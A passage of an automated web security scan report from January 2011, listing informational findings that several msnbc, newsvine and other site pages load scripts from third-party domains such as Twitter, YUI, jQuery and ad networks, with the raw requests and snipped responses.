</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.375. http://technolog.msnbc.redacted/windows-phone-7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /windows-phone-7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /windows-phone-7 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:43:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163007

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.376. http://technolog.msnbc.redacted/xbox

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /xbox

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /xbox HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:50:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149336

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlineCode__5774095" class="inlineCode photo_align_right" data-contentid="5774095"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.377. http://technolog.msnbc.redacted/youtube

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /youtube

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /youtube HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:34:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147979

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.378. http://technolog2.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog2.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:12 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.379. http://thebubble.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thebubble.redacted
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: thebubble.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:36 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
Content-Length: 25680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta htt
...[SNIP]...
<!-- Facebook API from facebook's server -->
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

23.380. http://theinvestedlife.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://theinvestedlife.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: theinvestedlife.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=897
Content-Length: 27793
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 02:06:05 GMT
Last-Modified: Sun, 30 Jan 2011 01:51:05 GMT
Server: Microsoft-IIS/7.5
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/">
...[SNIP]...
<div id="wrapperTracking"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js"></script><script type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...

23.381. http://thelastword.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thelastword.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67375

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>The Last Word</title>
<me
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/0c583da26dcf2b93a48946d34b740abb11aae3af.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cablemikeblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmikeblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.382. http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timheuer.com
Path:   /blog/articles/getting-started-with-silverlight-development.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/articles/getting-started-with-silverlight-development.aspx HTTP/1.1
Host: timheuer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 390459
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 29 Jan 2011 23:26:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <he
...[SNIP]...
</script>
   <script type="text/javascript" charset="utf-8" src="http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/timheuer.json?callback=twitterCallback2&amp;count=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="adzerk_ad_div">
<script type="text/javascript" src="http://theloungenet.com/Server/DOTNETSL/HEUER/VERT"></script>
...[SNIP]...

23.383. http://today.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://today.msnbc.msn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: no-cache
Expires: Sat, 29 Jan 2011 23:51:37 GMT
Date: Sat, 29 Jan 2011 23:51:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 214401

<html><head><title>TODAYshow.com: Matt Lauer, Meredith Vieira, Ann Curry, Al Roker, Natalie Morales - Video, News, Recipes, Health, Pets</title><link rel="stylesheet" type="text/css" href="/css/html40
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/03ECD8C4-A960-11DF-9090-D37F3FF5047F" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/288F6A98-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2442&lib=jquery&addwidgets=zinger,wetbar"></script>
...[SNIP]...

23.384. http://today.msnbc.redacted/id/37616868

Summary

Severity:   Information
Confidence:   Certain
Host:   http://today.msnbc.msn.com
Path:   /id/37616868

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/37616868 HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Cache-Control: private, max-age=162
Date: Sun, 30 Jan 2011 01:51:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107134


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia1.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/tdy-old-page.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
